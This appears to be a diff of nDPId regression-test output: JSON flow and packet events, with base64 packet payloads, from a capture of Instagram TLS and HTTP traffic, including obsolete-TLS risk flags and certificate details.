+00984{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908576,"flow_last_seen":1436720908617,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1436720908617,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00984{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908577,"flow_last_seen":1436720908619,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1436720908619,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01038{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":381,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908581,"flow_last_seen":1436720908633,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1676,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1436720908633,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}} +01437{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":385,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908581,"flow_last_seen":1436720908634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4354,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1436720908634,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}} +01038{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":389,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908572,"flow_last_seen":1436720908636,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1868,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1436720908636,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"7df57c06f869fc3ce509521cae2f75ce","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}} 
+01437{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":393,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908572,"flow_last_seen":1436720908638,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":454,"midstream":0,"thread_ts_msec":1436720908638,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"7df57c06f869fc3ce509521cae2f75ce","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}} 
+01038{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":398,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908576,"flow_last_seen":1436720908660,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1644,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1436720908660,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}} +01437{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":402,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908576,"flow_last_seen":1436720908661,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4322,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":1436720908661,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}} +01038{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":407,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908577,"flow_last_seen":1436720908663,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1644,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1436720908663,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}} 
+01437{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908577,"flow_last_seen":1436720908665,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4322,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":1436720908665,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":417,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1436720908719,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1436720908719,"pkt":"AAAAAAAAAAAAAAAACABFwABYvRgAAEABOq7AqABnwKgAZwMDAwcAAAAARQAAPLKEQABABvFRwKgAZ63CKBTA\/QG7ZKZcEQAAAACgAjkIlxQAAAIEBbQEAggKAAPulQAAAAABAwMG"} 
-02366{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1436720908720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":1436720908720,"pkt":"QPMIw47hABsv8H60CABFAAWqkOBAAFUGUh0fDV00wKgAZwG7g+MQ445PobbjVYAQANmoZAAAAQEICvAgso0AA+57FwMBBgAJWuxAFmWJOuMXXLFPa+ihsePS3XMy0YIQztBBVmLMKv7bKksLnHy6Qejj3IofgvBbzBtV3GqDkMg6uh0P6N7FwcSe3tUjgcGiijvn6K818Zp8xqjp0tEb5pWvqXYqObddd2Hnzu6vQfWb9eTm5eWBjMWaH+46WOkF+yLDu28OnCnI6DRA4hVUhPFmv3Y3Jc5EGy9h1liFAXpPz8RauF02nsY9w0LD3TtF0JwByoPONdeUPZq\/WKka9SPqVUAIaUqD+iiuPiB4iY\/P40454jR2ubUAx1KxalPDxCZcJOVc\/mRFMjjylf886\/qgnF5\/zNdIB+osc8LQ7+njijbpW6+nsd1r20QxY5h4iboPc5bOwlwaY54bOkKhUi3rW\/yK+SdRmOIbvY6QnNs\/NHnLztmSVepcsVQj4\/LAs3sQee2yV5Zb\/OKdnbNcoVz0fzHzanGF+shxmnBL7MHCUWI6dyfgrtdeHJw7AeiUY3i\/mTZNsE8HDXYtj4PZmBRSpw9Tn6yrOi8oCWZlu5KzIRGzRJtFphUHZ6meh5JLg+hn5njKZANgsGVL5D4VIgoF1kaCOaYkGXgkZUN4f977LcfvI6GMq+I5puCewiP+Uuk1kPF9pzskRav04M10TqsDM7GhlmoPVQK4OBUJ9tHagFf6IatPi0\/17iyM\/LjiFML0PoAxBFfvl5DWDm64B7S6wNuZznilyLl+dRCTX+DG4IWEZ9iWMuJz0q4h3NgjCjbVoEhcXrIzm79zTgYF1K\/Fc1eVQ5pDkZIk+MSfw+JmzqDNkO7KlRRDcuvw+93T8NghPFPmCMaGi36H+eJ8qZHgJQD6VyTq0u+kS7b7xcTR0rfQCJsFB5GAwMG7Gp3gleQk40HnR7gOPSTpCQbfSRM+5donNBgSWHGZa9A+e6lLq4NFCERiwzj3U\/o3rAI1FPY3nDbj4wb3EgILuovLCxScYhTNarC2IzSTHU8Qk8N2SV+q0qGc9KDK7Jyj+IHlvAecHsLgYXphxLiTsup\/3eR29a5fD0B54hNbSHf+QHisCGvO8syBPnMdbwGhHIhnTTwNn1eEHqk6X5WP24wp\/q9HBPEopbXKhKpIJHSzjJGb6QwaZFDvJ0eS8PBbauWDkSrvIOpQ+81F3KtLkj4QiFmXv6kUM6e\/ijm1X4ctGQCDMzfE6CL9kNIZ0KT10hk0pBqwVPBgsjzabFgBWuwkhXkJMqXx8tC1EU+7y29gsrs\/ybrD8eTd4mRW4AQWWxsx8SCg4RuBagiQndKzKvD7t\/D1UNx\/cjM+FPNHc3Vo6COyR4bKIxJFsFcqKxflWpQPrWlcHnstMeCf6fe7rHShYcn66kSCS9GJMM\/PUNJmbrAgWC5m7qX18BfYRtqglq81Hxihw61ZCMOoAsDBgvxxxkjs4uHIg0bxq+QIHC4jEm62Kc2GqcJIEifAbDIMGTrfg+zGbXs6fbA2wHWV\/6sG736+zvLX7Jbtdr+R3sSX9sMXEufLQEpr
DfFP7rjDtjD6q3s32bdz6TPKsaKweTpBUQdUPpxrBp58LHYIfh7kBM6ZZ7B\/leOdLQ4iB0qa4hkq1hvJbOmBVgxwN8J6lLAiR2zfKtjyjIgh1PIEwm0tWG3PrpvEGPUu+zdVEzsubp+CEZmpQpom3JAd8mN1yHxpyrcTLFJkY\/8guFvDtth\/joA1HCjPx5dnKVrWK+v+DF0itobPJ17srGXjTUdxq+PcFTOSkogqyTZpAghuLdzESZm4BYIuVxTMgSSAIWua\/B9nB7ubZGXJW35Hmjvh2589ysVkb287bswERaCrOs6tPVp2NtqRIS7vXD6J\/TWsp5LCRdFcfNfT70AwbYVcnpBdE0+y3eeVEDxU"} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":440,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942507,"flow_last_seen":1436720942507,"flow_idle_time":7440000,"flow_min_l4_payload_len":1418,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1418,"flow_avg_l4_payload_len":1418,"midstream":1,"thread_ts_msec":1436720942507,"l3_proto":"ip4","src_ip":"92.122.48.138","dst_ip":"192.168.0.103","src_port":80,"dst_port":41562,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -02412{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1436720942507,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720942507,"pkt":"QPMIw47hABsv8H60CABFAAW+7YVAADkGAKFcejCKwKgAZwBQolpM7hj\/zhvj2IAQAkuefgAAAQEIClRk1HoAA\/vEM\/iaPUALhIFKAs5lHhGDDQh9Ri+cJ7IlO3+U+lz\/AJfyy4DxuV\/4P\/o+vmeH\/hNqoIELoODxfoOAIXO0PMXMPnHoxqeYBwGo8oxahQh6j0xfzNnmEda9CmYCeDSna\/qNrEPvGW50RvR5h7uG+kXcGOBC7BGEPlQE7Yj9VADdS1kT29D7gnk\/qeBFzA3CDCDhz3gqv7gHmWA5mGyOJepR4EJPDEPmPiCsftA0fdwDBLwVjxH\/APKX29LRhXxOnSI4Ih5PTBEwQnYqjD3MPs\/lmZehG\/8AA\/8AT9Hx6L7CfPoFCO57QQY24Pf04EGPxc98QOB6OuYRGOvzGux+sHlCW3CnI9H6gK1Ng5mdNzFbgAyRCbreGctT5jQZEPRP6hHkIS+\/zCBFmIuGjFqI5\/uEmVBMg4hgvEdvaB+4PuYjwpncLG\/tARaSCgOECnAbe4e1GCNFARmxVQDALDyR+IOzv5nsz8T3R9wgRZi+8GdC55PovxL0YHoYoPEbSjg1BB16Ln\/4Ec+hG4XhdQP\/AAj\/A
MS6qDzBT7P5oVuK4jP\/AJHo+vQ7xerHEOB\/MJM94fCL+ohnTjGoAOagD3iFagB4f5QswHhzoMy9DME64+YwcJGH3EIGYuyBB\/nEZ7TiCoY8wSKYOu5S3H2g4tgD7wANpxRQzjSFNilH9hDgQM9sJvDWSNGHs+0x8CbLnF1CclwLoBlRBpI3BxPAqGmw4ykVAG2kgAoGHly28ROIeyXA2GoWBRqYf9ufUEBje0FkRrD+IQecxboE3AOv7hC5gHugOOCfdiAGoheJXCdB6Ed+p6M6LnkF\/wDE\/UhuA8wf1fzRQdReggNdvURGX6gnc9o44SIJ4hEESg55h9ABOXCdAKBoAFARRJEzn9QkfZAdHcCZJ+0IfM82YFNwK2Mw9qjfbgB0alLX9QhRGT8SvaFD494T\/MQk8fqbOERdBBwkdmvmWKJzcwHIfLgJbfaBYGFByYLxbUA8zSMwDgeEJIj+oTwQfxK2SqgEvgPeFbIcbVX7KFvlB0KE87hYZQPRwPeH6uPhbjHBiWw7nL\/pnZCDnKByYHCBX5hgfMf3hZBZhDmz8QG7Sft6CPUI8RE4GpvB6ATxO3ovP\/jgJ7wEhHscGHx\/KuIHYBmYYPQqqng7Ew+z+eE4MfX\/AIH\/AIC6cAjiPoYHoIzU95cXVxsDhHD1AhE8T+IY4OoOZmio9RCbH6gBuoGYHNqg6GxAMRoQsrcD5h\/xiG2xCYJgDAIuFMDMWQBiwOT8QxkaQi4CCaSgP+GHg7nfnqF6wY1vXxCXqouAITzC5A3GyRRmF3HmjA9oXEGuJ4Jq1PKGF\/7E95xsZ1BT9jB0SPvOduIB7RHP\/I2Kh0kBNLD6MJz\/AJxbQj\/cwB4GCtzsgKZoQlqFxuEQHvc\/HoBi7iniEcIXcEEJgK9QOtGCOFaheFFdZ+3oP5CQaM\/4fzxGF7M4WoAHGX69x7j9FCP\/AB2jTxue8EBOF7EXZxDcScHjmEuIzgiYdDA4gRRtmHoJ56mwKX8F7wmCMfSKDe0XnQmaYuEnIC1Mc2QAHUVdCAtCh95n5imGNgyjyD5nfMLuXxBSoSDA8yxX\/E2oKG5iGgBLzCfMJ8wOCHsTPCecIsrQDCihrgix+Z7lA8uF2\/cOhJ+kLZAhOzHsR5iHYfYwUTAf3AWIwicr0HmfKhO7a+IxmwhfEE4GEoYUcHmODzCekU8+jhiigMf\/AMP\/AC\/+CLkzo9Jgh9HB5hJiiiPP\/m\/QDF7gHoYUsRjU4ATF9pWVBkA54Qk7j4h1hQB0nyIzIr0gCl4cXcIPGA8E49oZ0qhZBz7QqP8AqAKhDWgfxPgD+8p7uAtmJgK+HmA8sQ2B+ggN5gCPfcBNIz9YSgzZ9hABBp2CMzM="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1436720942508,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720942508,"pkt":"ABsv8H60QPMIw47hCABFAAA0JelAAEAGxsfAqABnXHowiqJaAFDOG+PYTO4eiYAQH+pOOgAAAQEICgAD+8dUZNR5"} 
-02407{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1436720942509,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720942509,"pkt":"QPMIw47hABsv8H60CABFAAW+7YZAADkGAKBcejCKwKgAZwBQolpM7h6Jzhvj2IAQAkvuxQAAAQEIClRk1HoAA\/vEO6\/U4C+0OWUTJgAb794HkAIhArOYgdkfiI22BCGjBFAjMJ7H5gWBudggbAYMBAg88QCbuhm0hAg9wQYHeJyZzGwFB7zDuEb1CIxUMRuZfliB7np0MYgeoY4J7+qgeYPabQ\/aB4IL9PHo+vR91\/N\/x\/EBC\/8A0ezA+Z8w+PUejh1dzuvQYmm4BAIYI\/EcE+jUD4nkjsnAhNA8wx5OA5aeINz\/AAUBr\/OAOALiPDMHk39If+VARek0ggL5idUhkPX2hAQrDqABo5\/wj6blcUMHps+4h4H9wU9ldOEBaMbWJMBg7F6bLf4ECwWUHgrMEFkEjMCoIwBEzYQLC4LK3AoAyviVQjybhI9r6wlsCgB94VnhTqRmcsioR5j39iByFiDkW+p4l8DUIG3Dyi4mQAZhCyClDE8GHwYPw7gzQ7QkYBnMHUC44nvArqGLzB9YQbQj7EXX6jh\/8eYjwIFiiz8Q2EAOV\/J\/x\/NHF6LrmV6Dxcv0cqD0MXc+CC9nEbBVQOPX2ggjHHvMvqNwABPCOeMwlwkwvyoIxB0cfSIC0DB7xZrUJVmM5BC0yIAV7Yl2YC3A5ZgUA\/KF+xEAWdXLIAuYgd+YS27EPvuMQOQnQJw3GzgZ9R+JmMzlA+JlcA0TD1iDIUoajMm\/tESS4X3XHjoOZyDMKfeEmMwvwcoyHZ\/uUUCTC2rUXHInKoObP2gYKzOtS8IzHhA8F3HuZYIEo5ZHzE3qLhzoY+YAWCiPcGZwkp7ejUc+gga3G1eIfdfedlAT5gj5EE6gdzz6iFTkFQjlEicGXPeeH8X\/AB\/ED\/5XpeIz7wA8TpK\/gPv6VSjOjn1MAi\/3MI+8EfcCE7HBEANXcACPv6wUqjgLgz8RDKgfEwYWFaUo4Fqf7VxCfaXmKxR3zcPJAAMAF9qAAtEUIRw00NEmM0hCDHA7h7DEMhnudgYhPg9oeAYfNLwrg51CVPEQAWcPg7EXLL9MBJSwx9YZNq1KYagWYA+h4H0K2CvpPdEDv8GNXZrxEphqeRmaBf0jG3TP4gIo7h8Qnc7HMEPIQ9MYgoBDKJnhXF36CJa2ICTAm1lHzqHqEuYAMKeeIR3BwBhHkwuRAYAYoDD\/AOBC+IR1Pf8A9f8AA\/h\/p\/8AL9DK4jiQmCE+p9faB5idQkYTPD0B59HC\/aAQO7qV3CYV1ZgDiovRHuVyAfrBFwZNPjFwKif1AWf2J2OENoUB+iZ4gniUx+IHTH6wBkeYwWEmDrCuR+YjiR4wICxwiF5JxELRFQLQCHzHzuBEEnDGTAEqWD+ShAN5cKZpAYRsmSxHSjO2xQ6w+HMTYnzC1FonyIOIR3AYBABDff8AyDZtfEVIYiKJhQDgP8z5DwYCUEHYxPeKKGKB4hDSL3QYgR+UAOxj6StiMylB2zD5KM65g7cfcXxmA8LHvAuoZ5hg8w+6uLzB6JH6GVH6dnXp4ev\/AAP5gIT\/AOFzqcLgd\/8AjtF6GeB6BT3gEe4YP39BC4S
k49RQhRqeIehOPMAz8Inhwtq4LXEJ1aUu\/TzAstcfbxB5v9TsR6HUP3QMI4jOnKgzrELSNTN1A5H7Qk3lxdJcFQrcADz6E8y+DmEIbgGJhOH3BbcIGziEwHPJ+I+E4CPabiALnOh9A4O4qjsRRPELQDgwRZyEPYQruIeB+5TMEqcJo\/MI7Idz6oBxMrQnuUnkCBt\/UBe8Q9RQ1j1p3cA0hfMfiH3CITwf\/NQnmD0KswQ\/+f8Ah\/D9IUFjf\/oTHEIClQz2qBAYII+oVHHD6KGByZqnhBDD49B1AYAdwdz3iimo9Dc4Row\/KI5J\/uOEEGO5YEPBioY1COYTPdCMjxANjAId+EI6EA2AahcCHIIVEDqIt8j7wQrjygpv6whzUCbmYRCBYNQWyVqMbJQ="} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":465,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942530,"flow_last_seen":1436720942530,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720942530,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58052,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00821{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1436720942530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":326,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":326,"pkt_l4_len":292,"thread_ts_msec":1436720942530,"pkt":"ABsv8H60QPMIw47hCABFAAE4n8hAAEAGa\/HAqABnUlUaouLEAFAvtWVoUhBMjIAYFINNAAAAAQEICgAD+8pWC84nR0VUIC9ocGhvdG9zLWFrLXhhZjEvdDUxLjI4ODUtMTUvZTM1LzExNDE3MzQ5XzE2MTA0MjQ0NTI1NTk2MzhfMTU1OTA5NjE1Ml9uLmpwZz9zZT03IEhUVFAvMS4xDQpIb3N0OiBwaG90b3MtZy5hay5pbnN0YWdyYW0uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBJbnN0YWdyYW0gNy4xLjEgQW5kcm9pZCAoMTkvNC40LjI7IDQ4MGRwaTsgMTA4MHgxOTIwOyBzYW1zdW5nOyBHVC1JOTUwNTsgamZsdGU7IHFjb207IGl0X0lUKQ0KDQo="} 
